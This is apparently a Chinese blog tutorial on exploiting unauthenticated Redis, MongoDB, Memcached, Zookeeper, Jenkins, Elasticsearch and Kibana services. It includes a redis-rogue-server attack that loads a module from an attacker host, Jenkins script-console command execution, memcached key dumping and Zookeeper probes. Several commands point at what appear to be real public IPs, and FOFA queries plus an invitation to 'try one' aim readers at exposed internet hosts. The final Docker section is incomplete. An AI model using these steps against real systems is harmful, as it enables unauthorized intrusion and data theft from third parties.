未授权访问漏洞系列

环境

1.此漏洞需要靶场vulhub,可自行前往gethub下载

2.需要虚拟机或云服务器等linux系统,并在此系统安装docker和docker-compose提供环境支持

3.运行docker-compose指令为docker-compose up -d即可运行当前目录下的文件

Redis未授权访问漏洞

一、进入vulhub启动docker镜像

cd /vulhub-master/redis/4-unacc

启动docker

二、在系统安装redis,见上图

redis链接6379为redis的默认端口

复制代码
redis-cli -h 192.168.4.176 -p 6379

即可链接成功

三、可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目...

复制代码
 git clone https://github.com/n0b0dyCN/redis-rogue-server.git 

四、使用py脚本攻击redis

复制代码
python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

博主只有一台云服务器连不上,不想搞两个linux系统了,这个实验先这样吧

MongoDB未授权访问漏洞

复制代码
拉取镜像:docker pull mongo
启动镜像docker run -d -p 27017:27017  mongo
查看镜像:docker ps -a

漏洞利用

使用Navicat进行连接.

实例 可以在fofo里搜索 port="27017",去找一个连一下试一试,不过别犯法了

Memcached未授权访问漏洞

下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

复制代码
下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二使用Telnet程序探测目标的11211端口.

复制代码
#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

用fofa语法 port="11211"搜索

Zookeeper未授权访问漏洞

复制代码
port="2181"搜索资产

可以使用以下语句

复制代码
echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

使用Zookeeper可视化管理工具进行连接

复制代码
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使用以下fofa语法进行产品搜索

复制代码
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

靶场复现流程

复制代码
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm
下载
复制代码
rpm -ivh jenkins-1.620-1.1.noarch.rpm
安装

service jenkins start
启动
关防火墙
systemctl stop firewalld.service

访问服务地址

复制代码
http://1.92.134.1:8080/manage
http://1.92.134.1:8080/script
复制代码
#执行命令
println "whoami".execute().text  

Elasticsearch未授权访问漏洞

搜索语法

"Elasticsearch" && port="9200"

存在未授权访问则直接进入到信息页面...不需要输入用户密码登陆

复制代码
#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/nodes查看节点数据

Kibana未授权访问漏洞

搜索语句

复制代码
"kibana" && port="5601"

无需登录访问即存在未授权访问漏洞

Docker Remote APl未授权访问漏洞

port="8080" && app="Kubernetes"

相关推荐
志栋智能20 小时前
超自动化安全:构建智能安全运营的核心引擎
大数据·运维·服务器·数据库·安全·自动化·产品运营
星幻元宇VR21 小时前
VR航空航天科普设备【VR时空直升机】
科技·学习·安全·生活·vr
weixin_514253181 天前
428-uitars tmux
安全·web安全
KKKlucifer1 天前
日志审计与行为分析在安全服务中的应用实践
网络·人工智能·安全
ykjhr_3d1 天前
vr电力安全培训系统有哪些
安全·vr·华锐视点
枷锁—sha1 天前
【CTFshow-pwn系列】03_栈溢出【pwn 073】详解:静态编译下的自动化 ROP 链构建
网络·汇编·笔记·安全·网络安全·自动化
VBsemi-专注于MOSFET研发定制1 天前
面向高可靠与能效需求的安全存储系统功率器件选型策略与适配手册
安全
xixixi777771 天前
AI安全周记:AI驱动攻击占比50%、PQC国标落地、ShinyHunters连环袭击——面对1:25的攻防成本鸿沟,防守方还能撑多久?
人工智能·安全·ai·大模型·aigc·量子计算·供应链
智擎软件测评小祺1 天前
什么是非功能检测?筑牢软件性能与安全的基石
功能测试·安全·检测·cma·第三方检测·cnas·非功能检测
jinanwuhuaguo1 天前
OpenClaw执行奇点——因果链折叠与责任悬置的时间哲学(第十九篇)
前端·人工智能·安全·重构·openclaw